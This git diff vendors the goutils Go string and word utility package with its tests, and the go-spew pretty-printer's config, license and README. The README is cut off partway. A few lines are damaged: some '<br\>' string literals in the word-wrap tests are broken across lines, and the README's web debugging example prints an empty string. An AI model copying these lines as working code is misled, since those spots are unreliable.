+
+ if x, _ := Abbreviate(in, maxWidth); x != out {
+ t.Errorf("Abbreviate(%v, %v) = %v, want %v", in, maxWidth, x, out)
+ }
+
+ // Test 2
+ out = "abcdefg"
+ maxWidth = 7
+
+ if x, _ := Abbreviate(in, maxWidth); x != out {
+ t.Errorf("Abbreviate(%v, %v) = %v, want %v", in, maxWidth, x, out)
+ }
+
+ // Test 3
+ out = "a..."
+ maxWidth = 4
+
+ if x, _ := Abbreviate(in, maxWidth); x != out {
+ t.Errorf("Abbreviate(%v, %v) = %v, want %v", in, maxWidth, x, out)
+ }
+}
+
+func TestAbbreviateFull(t *testing.T) {
+
+ // Test 1
+ in := "abcdefghijklmno"
+ out := "abcdefg..."
+ offset := -1
+ maxWidth := 10
+
+ if x, _ := AbbreviateFull(in, offset, maxWidth); x != out {
+ t.Errorf("AbbreviateFull(%v, %v, %v) = %v, want %v", in, offset, maxWidth, x, out)
+ }
+
+ // Test 2
+ out = "...fghi..."
+ offset = 5
+ maxWidth = 10
+
+ if x, _ := AbbreviateFull(in, offset, maxWidth); x != out {
+ t.Errorf("AbbreviateFull(%v, %v, %v) = %v, want %v", in, offset, maxWidth, x, out)
+ }
+
+ // Test 3
+ out = "...ijklmno"
+ offset = 12
+ maxWidth = 10
+
+ if x, _ := AbbreviateFull(in, offset, maxWidth); x != out {
+ t.Errorf("AbbreviateFull(%v, %v, %v) = %v, want %v", in, offset, maxWidth, x, out)
+ }
+}
+
+func TestIndexOf(t *testing.T) {
+
+ // Test 1
+ str := "abcafgka"
+ sub := "a"
+ start := 0
+ out := 0
+
+ if x := IndexOf(str, sub, start); x != out {
+ t.Errorf("IndexOf(%v, %v, %v) = %v, want %v", str, sub, start, x, out)
+ }
+
+ // Test 2
+ start = 1
+ out = 3
+
+ if x := IndexOf(str, sub, start); x != out {
+ t.Errorf("IndexOf(%v, %v, %v) = %v, want %v", str, sub, start, x, out)
+ }
+
+ // Test 3
+ start = 4
+ out = 7
+
+ if x := IndexOf(str, sub, start); x != out {
+ t.Errorf("IndexOf(%v, %v, %v) = %v, want %v", str, sub, start, x, out)
+ }
+
+ // Test 4
+ sub = "z"
+ out = -1
+
+ if x := IndexOf(str, sub, start); x != out {
+ t.Errorf("IndexOf(%v, %v, %v) = %v, want %v", str, sub, start, x, out)
+ }
+
+}
+
+func TestIsBlank(t *testing.T) {
+
+ // Test 1
+ str := ""
+ out := true
+
+ if x := IsBlank(str); x != out {
+ t.Errorf("IndexOf(%v) = %v, want %v", str, x, out)
+ }
+
+ // Test 2
+ str = " "
+ out = true
+
+ if x := IsBlank(str); x != out {
+ t.Errorf("IndexOf(%v) = %v, want %v", str, x, out)
+ }
+
+ // Test 3
+ str = " abc "
+ out = false
+
+ if x := IsBlank(str); x != out {
+ t.Errorf("IndexOf(%v) = %v, want %v", str, x, out)
+ }
+}
+
+func TestDeleteWhiteSpace(t *testing.T) {
+
+ // Test 1
+ str := " a b c "
+ out := "abc"
+
+ if x := DeleteWhiteSpace(str); x != out {
+ t.Errorf("IndexOf(%v) = %v, want %v", str, x, out)
+ }
+
+ // Test 2
+ str = " "
+ out = ""
+
+ if x := DeleteWhiteSpace(str); x != out {
+ t.Errorf("IndexOf(%v) = %v, want %v", str, x, out)
+ }
+}
+
+func TestIndexOfDifference(t *testing.T) {
+
+ str1 := "abc"
+ str2 := "a_c"
+ out := 1
+
+ if x := IndexOfDifference(str1, str2); x != out {
+ t.Errorf("IndexOfDifference(%v, %v) = %v, want %v", str1, str2, x, out)
+ }
+}
+
+// ****************************** EXAMPLES ********************************************
+
+func ExampleAbbreviate() {
+
+ str := "abcdefg"
+ out1, _ := Abbreviate(str, 6)
+ out2, _ := Abbreviate(str, 7)
+ out3, _ := Abbreviate(str, 8)
+ out4, _ := Abbreviate(str, 4)
+ _, err1 := Abbreviate(str, 3)
+
+ fmt.Println(out1)
+ fmt.Println(out2)
+ fmt.Println(out3)
+ fmt.Println(out4)
+ fmt.Println(err1)
+ // Output:
+ // abc...
+ // abcdefg
+ // abcdefg
+ // a...
+ // stringutils illegal argument: Minimum abbreviation width is 4
+}
+
+func ExampleAbbreviateFull() {
+
+ str := "abcdefghijklmno"
+ str2 := "abcdefghij"
+ out1, _ := AbbreviateFull(str, -1, 10)
+ out2, _ := AbbreviateFull(str, 0, 10)
+ out3, _ := AbbreviateFull(str, 1, 10)
+ out4, _ := AbbreviateFull(str, 4, 10)
+ out5, _ := AbbreviateFull(str, 5, 10)
+ out6, _ := AbbreviateFull(str, 6, 10)
+ out7, _ := AbbreviateFull(str, 8, 10)
+ out8, _ := AbbreviateFull(str, 10, 10)
+ out9, _ := AbbreviateFull(str, 12, 10)
+ _, err1 := AbbreviateFull(str2, 0, 3)
+ _, err2 := AbbreviateFull(str2, 5, 6)
+
+ fmt.Println(out1)
+ fmt.Println(out2)
+ fmt.Println(out3)
+ fmt.Println(out4)
+ fmt.Println(out5)
+ fmt.Println(out6)
+ fmt.Println(out7)
+ fmt.Println(out8)
+ fmt.Println(out9)
+ fmt.Println(err1)
+ fmt.Println(err2)
+ // Output:
+ // abcdefg...
+ // abcdefg...
+ // abcdefg...
+ // abcdefg...
+ // ...fghi...
+ // ...ghij...
+ // ...ijklmno
+ // ...ijklmno
+ // ...ijklmno
+ // stringutils illegal argument: Minimum abbreviation width is 4
+ // stringutils illegal argument: Minimum abbreviation width with offset is 7
+}
+
+func ExampleIsBlank() {
+
+ out1 := IsBlank("")
+ out2 := IsBlank(" ")
+ out3 := IsBlank("bob")
+ out4 := IsBlank(" bob ")
+
+ fmt.Println(out1)
+ fmt.Println(out2)
+ fmt.Println(out3)
+ fmt.Println(out4)
+ // Output:
+ // true
+ // true
+ // false
+ // false
+}
+
+func ExampleDeleteWhiteSpace() {
+
+ out1 := DeleteWhiteSpace(" ")
+ out2 := DeleteWhiteSpace("bob")
+ out3 := DeleteWhiteSpace("bob ")
+ out4 := DeleteWhiteSpace(" b o b ")
+
+ fmt.Println(out1)
+ fmt.Println(out2)
+ fmt.Println(out3)
+ fmt.Println(out4)
+ // Output:
+ //
+ // bob
+ // bob
+ // bob
+}
+
+func ExampleIndexOf() {
+
+ str := "abcdefgehije"
+ out1 := IndexOf(str, "e", 0)
+ out2 := IndexOf(str, "e", 5)
+ out3 := IndexOf(str, "e", 8)
+ out4 := IndexOf(str, "eh", 0)
+ out5 := IndexOf(str, "eh", 22)
+ out6 := IndexOf(str, "z", 0)
+ out7 := IndexOf(str, "", 0)
+
+ fmt.Println(out1)
+ fmt.Println(out2)
+ fmt.Println(out3)
+ fmt.Println(out4)
+ fmt.Println(out5)
+ fmt.Println(out6)
+ fmt.Println(out7)
+ // Output:
+ // 4
+ // 7
+ // 11
+ // 7
+ // -1
+ // -1
+ // -1
+}
+
+func ExampleIndexOfDifference() {
+
+ out1 := IndexOfDifference("abc", "abc")
+ out2 := IndexOfDifference("ab", "abxyz")
+ out3 := IndexOfDifference("", "abc")
+ out4 := IndexOfDifference("abcde", "abxyz")
+
+ fmt.Println(out1)
+ fmt.Println(out2)
+ fmt.Println(out3)
+ fmt.Println(out4)
+ // Output:
+ // -1
+ // 2
+ // 0
+ // 2
+}
diff --git a/vendor/github.com/aokoli/goutils/wordutils.go b/vendor/github.com/aokoli/goutils/wordutils.go
new file mode 100644
index 0000000000..e92dd39900
--- /dev/null
+++ b/vendor/github.com/aokoli/goutils/wordutils.go
@@ -0,0 +1,356 @@
+/*
+Copyright 2014 Alexander Okoli
+
+Licensed under the Apache License, Version 2.0 (the "License");
+you may not use this file except in compliance with the License.
+You may obtain a copy of the License at
+
+ http://www.apache.org/licenses/LICENSE-2.0
+
+Unless required by applicable law or agreed to in writing, software
+distributed under the License is distributed on an "AS IS" BASIS,
+WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+See the License for the specific language governing permissions and
+limitations under the License.
+*/
+
+/*
+Package goutils provides utility functions to manipulate strings in various ways.
+The code snippets below show examples of how to use goutils. Some functions return
+errors while others do not, so usage would vary as a result.
+
+Example:
+
+ package main
+
+ import (
+ "fmt"
+ "github.com/aokoli/goutils"
+ )
+
+ func main() {
+
+ // EXAMPLE 1: A goutils function which returns no errors
+ fmt.Println (goutils.Initials("John Doe Foo")) // Prints out "JDF"
+
+
+
+ // EXAMPLE 2: A goutils function which returns an error
+ rand1, err1 := goutils.Random (-1, 0, 0, true, true)
+
+ if err1 != nil {
+ fmt.Println(err1) // Prints out error message because -1 was entered as the first parameter in goutils.Random(...)
+ } else {
+ fmt.Println(rand1)
+ }
+ }
+*/
+package goutils
+
+import (
+ "bytes"
+ "strings"
+ "unicode"
+)
+
+// VERSION indicates the current version of goutils
+const VERSION = "1.0.0"
+
+/*
+Wrap wraps a single line of text, identifying words by ' '.
+New lines will be separated by '\n'. Very long words, such as URLs will not be wrapped.
+Leading spaces on a new line are stripped. Trailing spaces are not stripped.
+
+Parameters:
+ str - the string to be word wrapped
+ wrapLength - the column (a column can fit only one character) to wrap the words at, less than 1 is treated as 1
+
+Returns:
+ a line with newlines inserted
+*/
+func Wrap(str string, wrapLength int) string {
+ return WrapCustom(str, wrapLength, "", false)
+}
+
+/*
+WrapCustom wraps a single line of text, identifying words by ' '.
+Leading spaces on a new line are stripped. Trailing spaces are not stripped.
+
+Parameters:
+ str - the string to be word wrapped
+ wrapLength - the column number (a column can fit only one character) to wrap the words at, less than 1 is treated as 1
+ newLineStr - the string to insert for a new line, "" uses '\n'
+ wrapLongWords - true if long words (such as URLs) should be wrapped
+
+Returns:
+ a line with newlines inserted
+*/
+func WrapCustom(str string, wrapLength int, newLineStr string, wrapLongWords bool) string {
+
+ if str == "" {
+ return ""
+ }
+ if newLineStr == "" {
+ newLineStr = "\n" // TODO Assumes "\n" is seperator. Explore SystemUtils.LINE_SEPARATOR from Apache Commons
+ }
+ if wrapLength < 1 {
+ wrapLength = 1
+ }
+
+ inputLineLength := len(str)
+ offset := 0
+
+ var wrappedLine bytes.Buffer
+
+ for inputLineLength-offset > wrapLength {
+
+ if rune(str[offset]) == ' ' {
+ offset++
+ continue
+ }
+
+ end := wrapLength + offset + 1
+ spaceToWrapAt := strings.LastIndex(str[offset:end], " ") + offset
+
+ if spaceToWrapAt >= offset {
+ // normal word (not longer than wrapLength)
+ wrappedLine.WriteString(str[offset:spaceToWrapAt])
+ wrappedLine.WriteString(newLineStr)
+ offset = spaceToWrapAt + 1
+
+ } else {
+ // long word or URL
+ if wrapLongWords {
+ end := wrapLength + offset
+ // long words are wrapped one line at a time
+ wrappedLine.WriteString(str[offset:end])
+ wrappedLine.WriteString(newLineStr)
+ offset += wrapLength
+ } else {
+ // long words aren't wrapped, just extended beyond limit
+ end := wrapLength + offset
+ index := strings.IndexRune(str[end:len(str)], ' ')
+ if index >= 0 { // wrap only when a space actually exists after the long word
+ spaceToWrapAt = index + end
+ wrappedLine.WriteString(str[offset:spaceToWrapAt])
+ wrappedLine.WriteString(newLineStr)
+ offset = spaceToWrapAt + 1
+ } else {
+ wrappedLine.WriteString(str[offset:len(str)])
+ offset = inputLineLength
+ }
+ }
+ }
+ }
+
+ wrappedLine.WriteString(str[offset:len(str)])
+
+ return wrappedLine.String()
+
+}
+
+/*
+Capitalize capitalizes all the delimiter separated words in a string. Only the first letter of each word is changed.
+To convert the rest of each word to lowercase at the same time, use CapitalizeFully(str string, delimiters ...rune).
+The delimiters represent a set of characters understood to separate words. The first string character
+and the first non-delimiter character after a delimiter will be capitalized. A "" input string returns "".
+Capitalization uses the Unicode title case, normally equivalent to upper case.
+
+Parameters:
+ str - the string to capitalize
+ delimiters - set of characters to determine capitalization; omitting this parameter means whitespace is the delimiter
+
+Returns:
+ capitalized string
+*/
+func Capitalize(str string, delimiters ...rune) string {
+
+ var delimLen int
+
+ if delimiters == nil {
+ delimLen = -1
+ } else {
+ delimLen = len(delimiters)
+ }
+
+ if str == "" || delimLen == 0 {
+ return str
+ }
+
+ buffer := []rune(str)
+ capitalizeNext := true
+ for i := 0; i < len(buffer); i++ {
+ ch := buffer[i]
+ if isDelimiter(ch, delimiters...) {
+ capitalizeNext = true
+ } else if capitalizeNext {
+ buffer[i] = unicode.ToTitle(ch)
+ capitalizeNext = false
+ }
+ }
+ return string(buffer)
+
+}
+
+/*
+CapitalizeFully converts all the delimiter separated words in a string into capitalized words, that is each word is made up of a
+titlecase character and then a series of lowercase characters. The delimiters represent a set of characters understood
+to separate words. The first string character and the first non-delimiter character after a delimiter will be capitalized.
+Capitalization uses the Unicode title case, normally equivalent to upper case.
+
+Parameters:
+ str - the string to capitalize fully
+ delimiters - set of characters to determine capitalization; omitting this parameter means whitespace is the delimiter
+
+Returns:
+ capitalized string
+*/
+func CapitalizeFully(str string, delimiters ...rune) string {
+
+ var delimLen int
+
+ if delimiters == nil {
+ delimLen = -1
+ } else {
+ delimLen = len(delimiters)
+ }
+
+ if str == "" || delimLen == 0 {
+ return str
+ }
+ str = strings.ToLower(str)
+ return Capitalize(str, delimiters...)
+}
+
+/*
+Uncapitalize uncapitalizes all the delimiter separated words in a string. Only the first letter of each word is changed.
+The delimiters represent a set of characters understood to separate words. The first string character and the first non-delimiter
+character after a delimiter will be uncapitalized. If no delimiters are given, whitespace is used, as defined by unicode.IsSpace(char).
+
+Parameters:
+ str - the string to uncapitalize
+ delimiters - set of characters to determine uncapitalization; omitting this parameter means whitespace is the delimiter
+
+Returns:
+ uncapitalized string
+*/
+func Uncapitalize(str string, delimiters ...rune) string {
+
+ var delimLen int
+
+ if delimiters == nil {
+ delimLen = -1
+ } else {
+ delimLen = len(delimiters)
+ }
+
+ if str == "" || delimLen == 0 {
+ return str
+ }
+
+ buffer := []rune(str)
+ uncapitalizeNext := true // TODO Always makes capitalize/un apply to first char.
+ for i := 0; i < len(buffer); i++ {
+ ch := buffer[i]
+ if isDelimiter(ch, delimiters...) {
+ uncapitalizeNext = true
+ } else if uncapitalizeNext {
+ buffer[i] = unicode.ToLower(ch)
+ uncapitalizeNext = false
+ }
+ }
+ return string(buffer)
+}
+
+/*
+SwapCase swaps the case of a string using a word based algorithm.
+
+Conversion algorithm:
+
+ Upper case character converts to Lower case
+ Title case character converts to Lower case
+ Lower case character after Whitespace or at start converts to Title case
+ Other Lower case character converts to Upper case
+ Whitespace is defined by unicode.IsSpace(char).
+
+Parameters:
+ str - the string to swap case
+
+Returns:
+ the changed string
+*/
+func SwapCase(str string) string {
+ if str == "" {
+ return str
+ }
+ buffer := []rune(str)
+
+ whitespace := true
+
+ for i := 0; i < len(buffer); i++ {
+ ch := buffer[i]
+ if unicode.IsUpper(ch) {
+ buffer[i] = unicode.ToLower(ch)
+ whitespace = false
+ } else if unicode.IsTitle(ch) {
+ buffer[i] = unicode.ToLower(ch)
+ whitespace = false
+ } else if unicode.IsLower(ch) {
+ if whitespace {
+ buffer[i] = unicode.ToTitle(ch)
+ whitespace = false
+ } else {
+ buffer[i] = unicode.ToUpper(ch)
+ }
+ } else {
+ whitespace = unicode.IsSpace(ch)
+ }
+ }
+ return string(buffer)
+}
+
+/*
+Initials extracts the initial letters from each word in the string. The first letter of the string and all first
+letters after the defined delimiters are returned as a new string. Their case is not changed. If the delimiters
+parameter is excluded, then whitespace is used. Whitespace is defined by unicode.IsSpace(char). An empty delimiter array returns an empty string.
+
+Parameters:
+ str - the string to get initials from
+ delimiters - set of characters to determine words; omitting this parameter means whitespace is the delimiter
+Returns:
+ string of initial letters
+*/
+func Initials(str string, delimiters ...rune) string {
+ if str == "" {
+ return str
+ }
+ if delimiters != nil && len(delimiters) == 0 {
+ return ""
+ }
+ strLen := len(str)
+ var buf bytes.Buffer
+ lastWasGap := true
+ for i := 0; i < strLen; i++ {
+ ch := rune(str[i])
+
+ if isDelimiter(ch, delimiters...) {
+ lastWasGap = true
+ } else if lastWasGap {
+ buf.WriteRune(ch)
+ lastWasGap = false
+ }
+ }
+ return buf.String()
+}
+
+// isDelimiter reports whether ch matches one of the given delimiters; with no delimiters, whitespace counts as a delimiter.
+func isDelimiter(ch rune, delimiters ...rune) bool {
+ if delimiters == nil {
+ return unicode.IsSpace(ch)
+ }
+ for _, delimiter := range delimiters {
+ if ch == delimiter {
+ return true
+ }
+ }
+ return false
+}
diff --git a/vendor/github.com/aokoli/goutils/wordutils_test.go b/vendor/github.com/aokoli/goutils/wordutils_test.go
new file mode 100644
index 0000000000..377d9439c9
--- /dev/null
+++ b/vendor/github.com/aokoli/goutils/wordutils_test.go
@@ -0,0 +1,225 @@
+package goutils
+
+import (
+ "fmt"
+ "testing"
+)
+
+// ****************************** TESTS ********************************************
+
+func TestWrapNormalWord(t *testing.T) {
+
+ in := "Bob Manuel Bob Manuel"
+ out := "Bob Manuel\nBob Manuel"
+ wrapLength := 10
+
+ if x := Wrap(in, wrapLength); x != out {
+ t.Errorf("Wrap(%v) = %v, want %v", in, x, out)
+ }
+}
+
+func TestWrapCustomLongWordFalse(t *testing.T) {
+
+ in := "BobManuelBob Bob"
+ out := "BobManuelBob
Bob"
+ wrapLength := 10
+ newLineStr := "
"
+ wrapLongWords := false
+
+ if x := WrapCustom(in, wrapLength, newLineStr, wrapLongWords); x != out {
+ t.Errorf("Wrap(%v) = %v, want %v", in, x, out)
+ }
+}
+
+func TestWrapCustomLongWordTrue(t *testing.T) {
+
+ in := "BobManuelBob Bob"
+ out := "BobManuelB
ob Bob"
+ wrapLength := 10
+ newLineStr := "
"
+ wrapLongWords := true
+
+ if x := WrapCustom(in, wrapLength, newLineStr, wrapLongWords); x != out {
+ t.Errorf("WrapCustom(%v) = %v, want %v", in, x, out)
+ }
+}
+
+func TestCapitalize(t *testing.T) {
+
+ // Test 1: Checks if function works with 1 parameter, and default whitespace delimiter
+ in := "test is going.well.thank.you.for inquiring"
+ out := "Test Is Going.well.thank.you.for Inquiring"
+
+ if x := Capitalize(in); x != out {
+ t.Errorf("Capitalize(%v) = %v, want %v", in, x, out)
+ }
+
+ // Test 2: Checks if function works with both parameters, with param 2 containing whitespace and '.'
+ out = "Test Is Going.Well.Thank.You.For Inquiring"
+ delimiters := []rune{' ', '.'}
+
+ if x := Capitalize(in, delimiters...); x != out {
+ t.Errorf("Capitalize(%v) = %v, want %v", in, x, out)
+ }
+}
+
+func TestCapitalizeFully(t *testing.T) {
+
+ // Test 1
+ in := "tEsT iS goiNG.wELL.tHaNk.yOU.for inqUIrING"
+ out := "Test Is Going.well.thank.you.for Inquiring"
+
+ if x := CapitalizeFully(in); x != out {
+ t.Errorf("CapitalizeFully(%v) = %v, want %v", in, x, out)
+ }
+
+ // Test 2
+ out = "Test Is Going.Well.Thank.You.For Inquiring"
+ delimiters := []rune{' ', '.'}
+
+ if x := CapitalizeFully(in, delimiters...); x != out {
+ t.Errorf("CapitalizeFully(%v) = %v, want %v", in, x, out)
+ }
+}
+
+func TestUncapitalize(t *testing.T) {
+
+ // Test 1: Checks if function works with 1 parameter, and default whitespace delimiter
+ in := "This Is A.Test"
+ out := "this is a.Test"
+
+ if x := Uncapitalize(in); x != out {
+ t.Errorf("Uncapitalize(%v) = %v, want %v", in, x, out)
+ }
+
+ // Test 2: Checks if function works with both parameters, with param 2 containing whitespace and '.'
+ out = "this is a.test"
+ delimiters := []rune{' ', '.'}
+
+ if x := Uncapitalize(in, delimiters...); x != out {
+ t.Errorf("Uncapitalize(%v) = %v, want %v", in, x, out)
+ }
+}
+
+func TestSwapCase(t *testing.T) {
+
+ in := "This Is A.Test"
+ out := "tHIS iS a.tEST"
+
+ if x := SwapCase(in); x != out {
+ t.Errorf("SwapCase(%v) = %v, want %v", in, x, out)
+ }
+}
+
+func TestInitials(t *testing.T) {
+
+ // Test 1
+ in := "John Doe.Ray"
+ out := "JD"
+
+ if x := Initials(in); x != out {
+ t.Errorf("Initials(%v) = %v, want %v", in, x, out)
+ }
+
+ // Test 2
+ out = "JDR"
+ delimiters := []rune{' ', '.'}
+
+ if x := Initials(in, delimiters...); x != out {
+ t.Errorf("Initials(%v) = %v, want %v", in, x, out)
+ }
+
+}
+
+// ****************************** EXAMPLES ********************************************
+
+func ExampleWrap() {
+
+ in := "Bob Manuel Bob Manuel"
+ wrapLength := 10
+
+ fmt.Println(Wrap(in, wrapLength))
+ // Output:
+ // Bob Manuel
+ // Bob Manuel
+}
+
+func ExampleWrapCustom_1() {
+
+ in := "BobManuelBob Bob"
+ wrapLength := 10
+ newLineStr := "
"
+ wrapLongWords := false
+
+ fmt.Println(WrapCustom(in, wrapLength, newLineStr, wrapLongWords))
+ // Output:
+ // BobManuelBob<br\>Bob
+}
+
+func ExampleWrapCustom_2() {
+
+ in := "BobManuelBob Bob"
+ wrapLength := 10
+ newLineStr := "
"
+ wrapLongWords := true
+
+ fmt.Println(WrapCustom(in, wrapLength, newLineStr, wrapLongWords))
+ // Output:
+ // BobManuelB<br\>ob Bob
+}
+
+func ExampleCapitalize() {
+
+ in := "test is going.well.thank.you.for inquiring" // Compare input to CapitalizeFully example
+ delimiters := []rune{' ', '.'}
+
+ fmt.Println(Capitalize(in))
+ fmt.Println(Capitalize(in, delimiters...))
+ // Output:
+ // Test Is Going.well.thank.you.for Inquiring
+ // Test Is Going.Well.Thank.You.For Inquiring
+}
+
+func ExampleCapitalizeFully() {
+
+ in := "tEsT iS goiNG.wELL.tHaNk.yOU.for inqUIrING" // Notice scattered capitalization
+ delimiters := []rune{' ', '.'}
+
+ fmt.Println(CapitalizeFully(in))
+ fmt.Println(CapitalizeFully(in, delimiters...))
+ // Output:
+ // Test Is Going.well.thank.you.for Inquiring
+ // Test Is Going.Well.Thank.You.For Inquiring
+}
+
+func ExampleUncapitalize() {
+
+ in := "This Is A.Test"
+ delimiters := []rune{' ', '.'}
+
+ fmt.Println(Uncapitalize(in))
+ fmt.Println(Uncapitalize(in, delimiters...))
+ // Output:
+ // this is a.Test
+ // this is a.test
+}
+
+func ExampleSwapCase() {
+
+ in := "This Is A.Test"
+ fmt.Println(SwapCase(in))
+ // Output:
+ // tHIS iS a.tEST
+}
+
+func ExampleInitials() {
+
+ in := "John Doe.Ray"
+ delimiters := []rune{' ', '.'}
+
+ fmt.Println(Initials(in))
+ fmt.Println(Initials(in, delimiters...))
+ // Output:
+ // JD
+ // JDR
+}
diff --git a/vendor/github.com/davecgh/go-spew/.gitignore b/vendor/github.com/davecgh/go-spew/.gitignore
new file mode 100644
index 0000000000..00268614f0
--- /dev/null
+++ b/vendor/github.com/davecgh/go-spew/.gitignore
@@ -0,0 +1,22 @@
+# Compiled Object files, Static and Dynamic libs (Shared Objects)
+*.o
+*.a
+*.so
+
+# Folders
+_obj
+_test
+
+# Architecture specific extensions/prefixes
+*.[568vq]
+[568vq].out
+
+*.cgo1.go
+*.cgo2.c
+_cgo_defun.c
+_cgo_gotypes.go
+_cgo_export.*
+
+_testmain.go
+
+*.exe
diff --git a/vendor/github.com/davecgh/go-spew/.travis.yml b/vendor/github.com/davecgh/go-spew/.travis.yml
new file mode 100644
index 0000000000..984e0736e7
--- /dev/null
+++ b/vendor/github.com/davecgh/go-spew/.travis.yml
@@ -0,0 +1,14 @@
+language: go
+go:
+ - 1.5.4
+ - 1.6.3
+ - 1.7
+install:
+ - go get -v golang.org/x/tools/cmd/cover
+script:
+ - go test -v -tags=safe ./spew
+ - go test -v -tags=testcgo ./spew -covermode=count -coverprofile=profile.cov
+after_success:
+ - go get -v github.com/mattn/goveralls
+ - export PATH=$PATH:$HOME/gopath/bin
+ - goveralls -coverprofile=profile.cov -service=travis-ci
diff --git a/vendor/github.com/davecgh/go-spew/LICENSE b/vendor/github.com/davecgh/go-spew/LICENSE
new file mode 100644
index 0000000000..c836416192
--- /dev/null
+++ b/vendor/github.com/davecgh/go-spew/LICENSE
@@ -0,0 +1,15 @@
+ISC License
+
+Copyright (c) 2012-2016 Dave Collins <dave@davec.name>
+
+Permission to use, copy, modify, and distribute this software for any
+purpose with or without fee is hereby granted, provided that the above
+copyright notice and this permission notice appear in all copies.
+
+THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES
+WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF
+MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR
+ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES
+WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN
+ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF
+OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.
diff --git a/vendor/github.com/davecgh/go-spew/README.md b/vendor/github.com/davecgh/go-spew/README.md
new file mode 100644
index 0000000000..262430449b
--- /dev/null
+++ b/vendor/github.com/davecgh/go-spew/README.md
@@ -0,0 +1,205 @@
+go-spew
+=======
+
+[![Build Status](https://img.shields.io/travis/davecgh/go-spew.svg)]
+(https://travis-ci.org/davecgh/go-spew) [![ISC License]
+(http://img.shields.io/badge/license-ISC-blue.svg)](http://copyfree.org) [![Coverage Status]
+(https://img.shields.io/coveralls/davecgh/go-spew.svg)]
+(https://coveralls.io/r/davecgh/go-spew?branch=master)
+
+
+Go-spew implements a deep pretty printer for Go data structures to aid in
+debugging. A comprehensive suite of tests with 100% test coverage is provided
+to ensure proper functionality. See `test_coverage.txt` for the gocov coverage
+report. Go-spew is licensed under the liberal ISC license, so it may be used in
+open source or commercial projects.
+
+If you're interested in reading about how this package came to life and some
+of the challenges involved in providing a deep pretty printer, there is a blog
+post about it
+[here](https://web.archive.org/web/20160304013555/https://blog.cyphertite.com/go-spew-a-journey-into-dumping-go-data-structures/).
+
+## Documentation
+
+[![GoDoc](https://img.shields.io/badge/godoc-reference-blue.svg)]
+(http://godoc.org/github.com/davecgh/go-spew/spew)
+
+Full `go doc` style documentation for the project can be viewed online without
+installing this package by using the excellent GoDoc site here:
+http://godoc.org/github.com/davecgh/go-spew/spew
+
+You can also view the documentation locally once the package is installed with
+the `godoc` tool by running `godoc -http=":6060"` and pointing your browser to
+http://localhost:6060/pkg/github.com/davecgh/go-spew/spew
+
+## Installation
+
+```bash
+$ go get -u github.com/davecgh/go-spew/spew
+```
+
+## Quick Start
+
+Add this import line to the file you're working in:
+
+```Go
+import "github.com/davecgh/go-spew/spew"
+```
+
+To dump a variable with full newlines, indentation, type, and pointer
+information use Dump, Fdump, or Sdump:
+
+```Go
+spew.Dump(myVar1, myVar2, ...)
+spew.Fdump(someWriter, myVar1, myVar2, ...)
+str := spew.Sdump(myVar1, myVar2, ...)
+```
+
+Alternatively, if you would prefer to use format strings with a compacted inline
+printing style, use the convenience wrappers Printf, Fprintf, etc with %v (most
+compact), %+v (adds pointer addresses), %#v (adds types), or %#+v (adds types
+and pointer addresses):
+
+```Go
+spew.Printf("myVar1: %v -- myVar2: %+v", myVar1, myVar2)
+spew.Printf("myVar3: %#v -- myVar4: %#+v", myVar3, myVar4)
+spew.Fprintf(someWriter, "myVar1: %v -- myVar2: %+v", myVar1, myVar2)
+spew.Fprintf(someWriter, "myVar3: %#v -- myVar4: %#+v", myVar3, myVar4)
+```
+
+## Debugging a Web Application Example
+
+Here is an example of how you can use `spew.Sdump()` to help debug a web application. Please be sure to wrap your output using the `html.EscapeString()` function for safety reasons. You should also only use this debugging technique in a development environment, never in production.
+
+```Go
+package main
+
+import (
+ "fmt"
+ "html"
+ "net/http"
+
+ "github.com/davecgh/go-spew/spew"
+)
+
+func handler(w http.ResponseWriter, r *http.Request) {
+ w.Header().Set("Content-Type", "text/html")
+ fmt.Fprintf(w, "Hi there, %s!", r.URL.Path[1:])
+ fmt.Fprintf(w, "")
+}
+
+func main() {
+ http.HandleFunc("/", handler)
+ http.ListenAndServe(":8080", nil)
+}
+```
+
+## Sample Dump Output
+
+```
+(main.Foo) {
+ unexportedField: (*main.Bar)(0xf84002e210)({
+ flag: (main.Flag) flagTwo,
+ data: (uintptr) <nil>
+ }),
+ ExportedField: (map[interface {}]interface {}) {
+ (string) "one": (bool) true
+ }
+}
+([]uint8) {
+ 00000000 11 12 13 14 15 16 17 18 19 1a 1b 1c 1d 1e 1f 20 |............... |
+ 00000010 21 22 23 24 25 26 27 28 29 2a 2b 2c 2d 2e 2f 30 |!"#$%&'()*+,-./0|
+ 00000020 31 32 |12|
+}
+```
+
+## Sample Formatter Output
+
+Double pointer to a uint8:
+```
+ %v: <**>5
+ %+v: <**>(0xf8400420d0->0xf8400420c8)5
+ %#v: (**uint8)5
+ %#+v: (**uint8)(0xf8400420d0->0xf8400420c8)5
+```
+
+Pointer to circular struct with a uint8 field and a pointer to itself:
+```
+ %v: <*>{1 <*><shown>}
+ %+v: <*>(0xf84003e260){ui8:1 c:<*>(0xf84003e260)<shown>}
+ %#v: (*main.circular){ui8:(uint8)1 c:(*main.circular)<shown>}
+ %#+v: (*main.circular)(0xf84003e260){ui8:(uint8)1 c:(*main.circular)(0xf84003e260)<shown>}
+```
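+
+For orientation, output like the circular sample above can be reproduced with a
+self-referential struct along these lines (the `circular` type here is
+reconstructed from the type names in the sample, not taken verbatim from the
+package):
+
+```Go
+package main
+
+import "github.com/davecgh/go-spew/spew"
+
+// circular mirrors the main.circular type implied by the sample output above.
+type circular struct {
+ ui8 uint8
+ c *circular
+}
+
+func main() {
+ c := circular{ui8: 1}
+ c.c = &c // the self-reference spew detects and marks as <shown>
+ spew.Printf("%+v\n", &c)
+}
+```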
+
+## Configuration Options
+
+Configuration of spew is handled by fields in the ConfigState type. For
+convenience, all of the top-level functions use a global state available via the
+spew.Config global.
+
+It is also possible to create a ConfigState instance that provides methods
+equivalent to the top-level functions. This allows concurrent configuration
+options. See the ConfigState documentation for more details.
+
+```
+* Indent
